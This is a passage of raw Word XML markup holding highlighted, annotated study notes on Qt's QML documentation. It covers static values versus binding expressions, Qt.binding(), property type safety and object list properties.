      </w:tblGrid>
      <w:tr w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidTr="008D1BBB">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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A1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA1A01">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737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EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA1A01">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Semantics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA1A01" w:rsidRPr="002230B8" w:rsidTr="008D1BBB">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EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D1BBB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Static Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737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EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA1A01">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A constant value which does not depend on other properties.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA1A01" w:rsidRPr="002230B8" w:rsidTr="008D1BBB">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EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D1BBB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Binding Expression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7370"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EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA1A01">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">A JavaScript expression which describes </w:t>
            </w:r>
            <w:r w:rsidRPr="008D1BBB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>a property's relationship with other properties</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA1A01">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. The variables in this expression are called the </w:t>
            </w:r>
            <w:r w:rsidRPr="008D1BBB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>property's</w:t>
            </w:r>
            <w:r w:rsidRPr="008D1BBB">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="008D1BBB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dependencies</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA1A01">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="2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The QML engine enforces the relationship between a property and its dependencies. </w:t>
            </w:r>
            <w:r w:rsidRPr="008D1BBB">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>When any of the dependencies change in value, the QML engine automatically re-evaluates the binding expression and assigns the new result to the property</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA1A01">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Here is an </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that shows both kinds of values being assigned to properties:</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10CB8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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lastRenderedPageBreak/>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 both of these are static value assignments on initialization</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400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 both of these are binding expression value assignments on initialization</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parent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width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parent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height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8D1BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To assign a binding expression imperatively, the binding expression must be contained in a function that is passed into</w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2732" w:anchor="binding-method" w:history="1">
        <w:r w:rsidRPr="008D1BBB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.binding()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and then the value returned by Qt.binding() must be assigned to the property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In contrast, Qt.binding() must not be used when assigning a binding expression upon initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2733" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Binding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
      <w:r w:rsidR="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="008D1BBB" w:rsidRPr="00490E7E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using context of Binding. I understood this type.</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E" w:rsidRPr="00490E7E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00490E7E" w:rsidRPr="00490E7E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Imperative establishing of binding</w:t>
      </w:r>
      <w:r w:rsidR="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2482" w:name="type-safety"/>
      <w:bookmarkStart w:id="2483" w:name="_Toc483001070"/>
      <w:bookmarkStart w:id="2484" w:name="_Toc483604405"/>
      <w:bookmarkStart w:id="2485" w:name="_Toc483605625"/>
      <w:bookmarkEnd w:id="2482"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type Safety</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2483"/>
      <w:bookmarkEnd w:id="2484"/>
      <w:bookmarkEnd w:id="2485"/>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8D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Properties are type safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A property </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can only be assigned a value that matches the property type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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For </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, if a property is a real, and if you try to assign a string to it, you will get an error:</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> volume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"four"</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 generates an error; the property's object will not be loaded</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Likewise if a property is assigned a value of the wrong type during run time, the new value will not be assigned, and an error will be generated.</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8D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some property types do not have a natural value representation, and for those property types the QML engine automatically performs string-to-typed-value conversion</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. So, for example, even though properties of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type store colors and not strings, you are able to assign the string</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"red"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to a color property, without an error being reported.</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See</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2734" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Basic Types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for a list of the types of properties that are supported by default. Additionally, any available</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2735" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML object type</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may also be used as a property type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2486" w:name="special-property-types"/>
      <w:bookmarkStart w:id="2487" w:name="_Toc483001071"/>
      <w:bookmarkStart w:id="2488" w:name="_Toc483604406"/>
      <w:bookmarkStart w:id="2489" w:name="_Toc483605626"/>
      <w:bookmarkEnd w:id="2486"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Property Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2487"/>
      <w:bookmarkEnd w:id="2488"/>
      <w:bookmarkEnd w:id="2489"/>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2490" w:name="object-list-property-attributes"/>
      <w:bookmarkStart w:id="2491" w:name="_Toc483001072"/>
      <w:bookmarkStart w:id="2492" w:name="_Toc483604407"/>
      <w:bookmarkStart w:id="2493" w:name="_Toc483605627"/>
      <w:bookmarkEnd w:id="2490"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Object List Property Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2491"/>
      <w:bookmarkEnd w:id="2492"/>
      <w:bookmarkEnd w:id="2493"/>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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2736" w:history="1">
        <w:r w:rsidRPr="008D1BBB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>list</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be assigned a list of QML object-type values. The </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for defining an object list value is a comma-separated list surrounded by square brackets:</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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">item </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
